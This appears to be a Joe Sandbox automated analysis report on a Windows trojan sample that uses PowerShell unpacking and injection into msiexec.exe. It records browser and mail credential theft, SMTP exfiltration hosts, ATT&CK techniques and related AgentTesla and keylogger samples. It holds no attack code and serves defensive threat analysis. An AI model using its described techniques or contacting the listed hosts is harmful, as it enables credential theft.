              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ulf4JrCRk2.exeCode function: 0_2_00405D13 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405D13

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: 00000005.00000002.2626602783.0000000023CED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2626602783.0000000023CC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 764, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: Yara matchFile source: 00000005.00000002.2626602783.0000000023CC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 764, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: 00000005.00000002.2626602783.0000000023CED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2626602783.0000000023CC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 764, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              Obfuscated Files or Information
              1
              OS Credential Dumping
              2
              File and Directory Discovery
              Remote Services1
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts1
              Native API
              Boot or Logon Initialization Scripts311
              Process Injection
              1
              Software Packing
              LSASS Memory24
              System Information Discovery
              Remote Desktop Protocol1
              Data from Local System
              11
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              DLL Side-Loading
              Security Account Manager321
              Security Software Discovery
              SMB/Windows Admin Shares1
              Email Collection
              1
              Non-Standard Port
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Masquerading
              NTDS1
              Process Discovery
              Distributed Component Object Model1
              Clipboard Data
              2
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script141
              Virtualization/Sandbox Evasion
              LSA Secrets141
              Virtualization/Sandbox Evasion
              SSHKeylogging23
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts311
              Process Injection
              Cached Domain Credentials1
              Application Window Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
              System Network Configuration Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1549408 Sample: ulf4JrCRk2.exe Startdate: 05/11/2024 Architecture: WINDOWS Score: 100 19 us2.smtp.mailhostbox.com 2->19 21 smtp.santonswitchgears.com 2->21 23 4 other IPs or domains 2->23 31 Suricata IDS alerts for network traffic 2->31 33 Found malware configuration 2->33 35 Multi AV Scanner detection for submitted file 2->35 37 4 other signatures 2->37 8 ulf4JrCRk2.exe 2 15 2->8         started        signatures3 process4 process5 10 powershell.exe 26 8->10         started        signatures6 39 Early bird code injection technique detected 10->39 41 Writes to foreign memory regions 10->41 43 Found suspicious powershell code related to unpacking or dynamic code loading 10->43 45 2 other signatures 10->45 13 msiexec.exe 15 8 10->13         started        17 conhost.exe 10->17         started        process7 dnsIp8 25 us2.smtp.mailhostbox.com 208.91.199.223, 49933, 587 PUBLIC-DOMAIN-REGISTRYUS United States 13->25 27 ip-api.com 208.95.112.1, 49919, 80 TUT-ASUS United States 13->27 29 3 other IPs or domains 13->29 47 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 13->47 49 Tries to steal Mail credentials (via file / registry access) 13->49 51 Tries to harvest and steal browser information (history, passwords, etc) 13->51 53 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 13->53 signatures9

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              ulf4JrCRk2.exe16%ReversingLabsWin32.Trojan.Generic
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://smtp.santonswitchgears.com0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              us2.smtp.mailhostbox.com
              208.91.199.223
              truetrue
                unknown
                s-part-0017.t-0009.fb-t-msedge.net
                13.107.253.45
                truefalse
                  high
                  drive.google.com
                  216.58.206.46
                  truefalse
                    high
                    drive.usercontent.google.com
                    142.250.185.193
                    truefalse
                      high
                      api.ipify.org
                      172.67.74.152
                      truefalse
                        high
                        ip-api.com
                        208.95.112.1
                        truefalse
                          high
                          smtp.santonswitchgears.com
                          unknown
                          unknowntrue
                            unknown
                            NameMaliciousAntivirus DetectionReputation
                            https://api.ipify.org/false
                              high
                              http://ip-api.com/line/?fields=hostingfalse
                                high
                                NameSourceMaliciousAntivirus DetectionReputation
                                https://www.google.commsiexec.exe, 00000005.00000003.1665700699.00000000083F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1665641488.00000000083F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1559586535.0000000005C47000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://api.ipify.orgmsiexec.exe, 00000005.00000002.2626602783.0000000023C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://nsis.sf.net/NSIS_Errorulf4JrCRk2.exefalse
                                        high
                                        http://crl.micropowershell.exe, 00000002.00000002.1555618352.00000000029B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.1556687538.0000000004D36000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://smtp.santonswitchgears.commsiexec.exe, 00000005.00000002.2626602783.0000000023CED000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://us2.smtp.mailhostbox.commsiexec.exe, 00000005.00000002.2626602783.0000000023CED000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.1556687538.0000000004BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.1556687538.0000000004D36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://drive.google.com/msiexec.exe, 00000005.00000002.2614911399.00000000083BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://contoso.com/powershell.exe, 00000002.00000002.1559586535.0000000005C47000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1559586535.0000000005C47000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://contoso.com/Licensepowershell.exe, 00000002.00000002.1559586535.0000000005C47000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://ip-api.commsiexec.exe, 00000005.00000002.2626602783.0000000023CB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://contoso.com/Iconpowershell.exe, 00000002.00000002.1559586535.0000000005C47000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://drive.usercontent.google.com/msiexec.exe, 00000005.00000002.2614911399.00000000083EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://apis.google.commsiexec.exe, 00000005.00000003.1665700699.00000000083F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1665641488.00000000083F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://nsis.sf.net/NSIS_ErrorErrorulf4JrCRk2.exefalse
                                                                    high
                                                                    https://api.ipify.org/tmsiexec.exe, 00000005.00000002.2626602783.0000000023C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1556687538.0000000004BE1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2626602783.0000000023C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.1556687538.0000000004D36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs
                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          142.250.185.193
                                                                          drive.usercontent.google.comUnited States
                                                                          15169GOOGLEUSfalse
                                                                          208.95.112.1
                                                                          ip-api.comUnited States
                                                                          53334TUT-ASUSfalse
                                                                          208.91.199.223
                                                                          us2.smtp.mailhostbox.comUnited States
                                                                          394695PUBLIC-DOMAIN-REGISTRYUStrue
                                                                          216.58.206.46
                                                                          drive.google.comUnited States
                                                                          15169GOOGLEUSfalse
                                                                          172.67.74.152
                                                                          api.ipify.orgUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                          Analysis ID:1549408
                                                                          Start date and time:2024-11-05 16:08:57 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 6m 58s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:10
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:ulf4JrCRk2.exe
                                                                          renamed because original name is a hash value
                                                                          Original Sample Name:26d13e127041233e0a01a631c489b05b175a3c91a2cb2bf289a4188d483d317c.exe
                                                                          Detection:MAL
                                                                          Classification:mal100.troj.spyw.evad.winEXE@17/11@5/5
                                                                          EGA Information:
                                                                          • Successful, ratio: 66.7%
                                                                          HCA Information:
                                                                          • Successful, ratio: 97%
                                                                          • Number of executed functions: 145
                                                                          • Number of non-executed functions: 27
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .exe
                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                          • Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                          • Execution Graph export aborted for target powershell.exe, PID 2804 because it is empty
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          • VT rate limit hit for: ulf4JrCRk2.exe
                                                                          TimeTypeDescription
                                                                          10:09:49API Interceptor35x Sleep call for process: powershell.exe modified
                                                                          10:10:25API Interceptor676895x Sleep call for process: msiexec.exe modified
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          208.95.112.1Nt8BLNLKN7.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                          • ip-api.com/line/?fields=hosting
                                                                          NOuxGNqQH7.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • ip-api.com/line/?fields=hosting
                                                                          IPx5gzPi7I.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • ip-api.com/line/?fields=hosting
                                                                          copto de pago.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • ip-api.com/line/?fields=hosting
                                                                          RDF987656789000.cmd.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • ip-api.com/line/?fields=hosting
                                                                          orden de compra_.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                          • ip-api.com/line/?fields=hosting
                                                                          2q8mDVUlgI.exeGet hashmaliciousXWormBrowse
                                                                          • ip-api.com/line/?fields=hosting
                                                                          iu56HJ45NV.exeGet hashmaliciousUnknownBrowse
                                                                          • ip-api.com/json/?fields=225545
                                                                          SecuriteInfo.com.Trojan.DownLoader47.48553.17653.26482.exeGet hashmaliciousXWormBrowse
                                                                          • ip-api.com/line/?fields=hosting
                                                                          QUOTATION#09678.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • ip-api.com/line/?fields=hosting
                                                                          208.91.199.223Nt8BLNLKN7.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                            SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              Proforma Invoice_21-1541 And Packing List.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                PO.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  Request for Quotation Plug Valve.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    Purchase Order 007823-PO# 005307.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      z9OutstandingPayment.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        SecuriteInfo.com.Win32.RATX-gen.3768.11045.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          UPDATED FLOOR PLAN_3D.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            New Order PO#86637.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              172.67.74.1522b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
                                                                                              • api.ipify.org/
                                                                                              Zc9eO57fgF.elfGet hashmaliciousUnknownBrowse
                                                                                              • api.ipify.org/
                                                                                              67065b4c84713_Javiles.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                              • api.ipify.org/
                                                                                              Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                                                                                              • api.ipify.org/
                                                                                              4F08j2Rmd9.binGet hashmaliciousXmrigBrowse
                                                                                              • api.ipify.org/
                                                                                              y8tCHz7CwC.binGet hashmaliciousXmrigBrowse
                                                                                              • api.ipify.org/
                                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                                              • api.ipify.org/
                                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                                              • api.ipify.org/
                                                                                              file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                              • api.ipify.org/
                                                                                              file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                              • api.ipify.org/
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              us2.smtp.mailhostbox.comNt8BLNLKN7.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                              • 208.91.199.223
                                                                                              copto de pago.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 208.91.199.224
                                                                                              SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 208.91.199.223
                                                                                              Proforma Invoice_21-1541 And Packing List.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 208.91.199.223
                                                                                              Tax Invoice 103505.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 208.91.199.224
                                                                                              PO.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 208.91.199.223
                                                                                              Purchase_Order.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 208.91.198.143
                                                                                              Scanned.pdf.pif.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 208.91.199.225
                                                                                              Request for Quotation Plug Valve.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 208.91.199.223
                                                                                              Cotizaci#U00f3n P13000996 pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 208.91.198.143
                                                                                              ip-api.comNt8BLNLKN7.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                              • 208.95.112.1
                                                                                              NOuxGNqQH7.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 208.95.112.1
                                                                                              IPx5gzPi7I.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 208.95.112.1
                                                                                              copto de pago.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 208.95.112.1
                                                                                              RDF987656789000.cmd.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 208.95.112.1
                                                                                              orden de compra_.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                              • 208.95.112.1
                                                                                              2q8mDVUlgI.exeGet hashmaliciousXWormBrowse
                                                                                              • 208.95.112.1
                                                                                              iu56HJ45NV.exeGet hashmaliciousUnknownBrowse
                                                                                              • 208.95.112.1
                                                                                              SecuriteInfo.com.Trojan.DownLoader47.48553.17653.26482.exeGet hashmaliciousXWormBrowse
                                                                                              • 208.95.112.1
                                                                                              QUOTATION#09678.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 208.95.112.1
                                                                                              s-part-0017.t-0009.fb-t-msedge.nethttps://virtual.urban-orthodontics.comGet hashmaliciousUnknownBrowse
                                                                                              • 13.107.253.45
                                                                                              https://micheline.aceflavall.com/Get hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                              • 13.107.253.45
                                                                                              file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, XWormBrowse
                                                                                              • 13.107.253.45
                                                                                              b9Mm2hq1pU.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                              • 13.107.253.45
                                                                                              s200ld6btf.exeGet hashmaliciousFormBookBrowse
                                                                                              • 13.107.253.45
                                                                                              https://bulbapp.com/u/sharefile?sharedLink=1db1fe96-5bdb-4c8c-ba45-33caa906abddGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 13.107.253.45
                                                                                              https://1drv.ms/o/c/66fa7da2ba9759b3/EqcaXs4PlQlIgYgaPtxczNwB_gWaZXRP_eT5RhV50i4cxw?e=5%3aJHIMrP&sharingv2=true&fromShare=true&at=9Get hashmaliciousUnknownBrowse
                                                                                              • 13.107.253.45
                                                                                              Ransomware VXUG Ransom.exeGet hashmaliciousCryLock, LOCKFILEBrowse
                                                                                              • 13.107.253.45
                                                                                              https://load.contbot.com.br/Get hashmaliciousUnknownBrowse
                                                                                              • 13.107.253.45
                                                                                              Ziraat Bankasi Swift Mesaji..exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 13.107.253.45
                                                                                              api.ipify.orgD6yz87XjgM.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 172.67.74.152
                                                                                              Nt8BLNLKN7.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                              • 172.67.74.152
                                                                                              Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                              • 172.67.74.152
                                                                                              b9Mm2hq1pU.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                              • 104.26.13.205
                                                                                              https://mlflegal.sharefile.com/public/share/web-s929b2bfc135a4aadb68ad5b8c7324a2eGet hashmaliciousUnknownBrowse
                                                                                              • 172.67.74.152
                                                                                              Ransomware Mallox.exeGet hashmaliciousTargeted RansomwareBrowse
                                                                                              • 104.26.12.205
                                                                                              COTIZACION.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                              • 104.26.12.205
                                                                                              REVISED PO NO.8389.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 104.26.13.205
                                                                                              https://www.canva.com/design/DAGVlowNqco/LaGv3kp6ecOkwIXDSEYQLQ/view?utm_content=DAGVlowNqco&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                                                              • 104.26.12.205
                                                                                              Shipping documents.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                              • 172.67.74.152
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              TUT-ASUSNt8BLNLKN7.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                              • 208.95.112.1
                                                                                              NOuxGNqQH7.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 208.95.112.1
                                                                                              IPx5gzPi7I.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 208.95.112.1
                                                                                              copto de pago.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 208.95.112.1
                                                                                              RDF987656789000.cmd.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 208.95.112.1
                                                                                              orden de compra_.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                              • 208.95.112.1
                                                                                              2q8mDVUlgI.exeGet hashmaliciousXWormBrowse
                                                                                              • 208.95.112.1
                                                                                              iu56HJ45NV.exeGet hashmaliciousUnknownBrowse
                                                                                              • 208.95.112.1
                                                                                              SecuriteInfo.com.Trojan.DownLoader47.48553.17653.26482.exeGet hashmaliciousXWormBrowse
                                                                                              • 208.95.112.1
                                                                                              QUOTATION#09678.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 208.95.112.1
                                                                                              PUBLIC-DOMAIN-REGISTRYUSNt8BLNLKN7.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                              • 208.91.199.223
                                                                                              p4rsJEIb7k.exeGet hashmaliciousFormBookBrowse
                                                                                              • 119.18.54.27
                                                                                              copto de pago.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 208.91.199.224
                                                                                              1364. 2024.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 199.79.62.115
                                                                                              Quote_220072.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 199.79.62.115
                                                                                              TT Copy.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                              • 199.79.62.115
                                                                                              24-17745.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 199.79.62.115
                                                                                              HSBC Payment Advice.exeGet hashmaliciousFormBookBrowse
                                                                                              • 208.91.199.22
                                                                                              H33UCslPzv.exeGet hashmaliciousXWormBrowse
                                                                                              • 103.53.40.62
                                                                                              PILNE ZAPYTANIE RFQ-05567-2024.10.25.vbsGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                              • 199.79.62.19
                                                                                              CLOUDFLARENETUShttps://micheline.aceflavall.com/Get hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                              • 104.21.20.47
                                                                                              D6yz87XjgM.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 172.67.74.152
                                                                                              http://www.axa-assistance.co.ukGet hashmaliciousUnknownBrowse
                                                                                              • 104.18.86.42
                                                                                              Nt8BLNLKN7.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                              • 172.67.74.152
                                                                                              L#U043e#U0430der.exeGet hashmaliciousLummaCBrowse
                                                                                              • 172.67.187.9
                                                                                              https://www.primechoicefinance.com.au/dykjj.php?7096797967704b53693230746450797938717a5330754c4530737a736a58533837503155744a31533870547662544277413dYnJhc3dlbGxzQGhlbGVuYWluZHVzdHJpZXMuY29tGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 104.17.25.14
                                                                                              p4rsJEIb7k.exeGet hashmaliciousFormBookBrowse
                                                                                              • 104.21.94.87
                                                                                              https://www.imap.ne.jp/banner_click/add/20/1/?a&url=http://uniteseoul.comGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 104.17.25.14
                                                                                              Fuji Xerox ENCLOSED - Revised DRAFT.pdfGet hashmaliciousUnknownBrowse
                                                                                              • 104.17.25.14
                                                                                              QzX4KXBXPq.exeGet hashmaliciousLummaCBrowse
                                                                                              • 188.114.97.3
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              3b5074b1b5d032e5620f69f9f700ff0eD6yz87XjgM.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 172.67.74.152
                                                                                              http://www.axa-assistance.co.ukGet hashmaliciousUnknownBrowse
                                                                                              • 172.67.74.152
                                                                                              Nt8BLNLKN7.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                              • 172.67.74.152
                                                                                              https://www.imap.ne.jp/banner_click/add/20/1/?a&url=http://uniteseoul.comGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 172.67.74.152
                                                                                              QzX4KXBXPq.exeGet hashmaliciousLummaCBrowse
                                                                                              • 172.67.74.152
                                                                                              5jh97SOa7H.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 172.67.74.152
                                                                                              Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                              • 172.67.74.152
                                                                                              RFQABCO004806L____________________pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 172.67.74.152
                                                                                              b9Mm2hq1pU.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                              • 172.67.74.152
                                                                                              file.exeGet hashmaliciousLummaC, XWormBrowse
                                                                                              • 172.67.74.152
